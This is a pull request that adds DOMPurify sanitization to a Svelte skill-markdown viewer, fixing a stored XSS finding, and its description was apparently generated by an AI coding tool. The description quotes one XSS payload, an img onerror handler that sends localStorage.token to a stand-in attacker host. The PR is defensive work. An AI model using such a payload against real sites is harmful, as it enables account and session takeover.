### PR TITLE
Sanitize skill markdown before rendering (D-01 XSS, Refs #288)

### DIFF
--- a/web/src/lib/lq-ai/components/SkillSourceView.svelte
+++ b/web/src/lib/lq-ai/components/SkillSourceView.svelte
@@ -1,6 +1,7 @@
 <script lang="ts">
 	import { onMount } from 'svelte';
 	import { marked } from 'marked';
+	import DOMPurify from 'dompurify';
 	import { skillsApi } from '$lib/lq-ai/api';
 	import type { SkillInputs, SkillInputDef } from '$lib/lq-ai/types';
 
@@ -45,7 +46,13 @@
 		return def.type ?? 'string';
 	}
 
-	$: renderedMd = marked(contentMd ?? '', { breaks: true }) as string;
+	// Skill bodies are authored content — team-scope skills and, for built-in
+	// skills, the `skills/community` git submodule — so the raw HTML that marked
+	// passes through MUST be DOMPurify-sanitized before {@html} below, or a
+	// crafted body runs script in the viewer's session (stored XSS). Mirrors
+	// the DOMPurify pattern used for assistant markdown in MessageBubble.
+	// #288 (D-01).
+	$: renderedMd = DOMPurify.sanitize(marked(contentMd ?? '', { breaks: true }) as string);
 
 	onMount(() => {
 		loadInputs();


### PR DESCRIPTION
## What this PR does

Sanitizes the skill markdown body in `SkillSourceView.svelte` with `DOMPurify` before it is injected via `{@html}`.

## Why

`Refs #288` — finding **D-01 (High, stored XSS)**. `SkillSourceView` computed `renderedMd = marked(contentMd ?? '', { breaks: true })` and injected it with `{@html}` and **no** sanitization — the one LQ-authored `{@html}` sink that skipped the DOMPurify convention the rest of the UI follows (`MessageBubble`, the inherited Open WebUI markdown pipeline). `marked@^9` removed its built-in sanitizer, so raw inline HTML passes straight through. Skill bodies are authored content — team-scope skills (a team admin's body renders for every member) and, for built-ins, the `skills/community` git submodule — so a body such as `<img src=x onerror=fetch('//attacker/'+localStorage.token)>` runs script in a viewer's authenticated session on opening the Source tab. Open WebUI stores the auth token in `localStorage`, so that is account/session takeover.

## How

`import DOMPurify from 'dompurify'` (already a dependency) and wrap the render: `DOMPurify.sanitize(marked(...) as string)` — identical to the pattern already used in `MessageBubble.svelte`.

## Type of change

- [x] Bug fix (non-breaking change that fixes an issue)

## Testing

- [x] Manually reasoned against the sink; mirrors the audited-safe `MessageBubble` sanitization.

<details>
<summary>On automated tests</summary>

No vitest unit test was added: this repo's vitest runs in the **node** environment with no DOM (there is no `test`/jsdom config; tests exercise pure logic exported from `<script context="module">`, and DOM-rendering behavior is covered by **Cypress** per the house convention, e.g. `RefusalMessageBubble.test.ts`). `DOMPurify.sanitize` requires a DOM, so it cannot be exercised in that node harness. The change is a one-line reuse of the same DOMPurify call `MessageBubble` already relies on. `svelte-check` + prettier run in CI (`Web` job) — web deps were not installed in this sandbox. Happy to add a Cypress case if maintainers prefer.

</details>

## Documentation

- [x] n/a — no API/schema/behavior change beyond the sanitization.

## Transparency & governance invariants

- [x] **Fail restrictive (P4):** untrusted skill-body HTML is now stripped before rendering.

## DCO sign-off

- [x] All commits in this PR are signed off per the DCO.

## Related issues

Refs #288 (D-01).

🤖 Generated with [Claude Code](https://claude.com/claude-code) (Claude Fable 5)
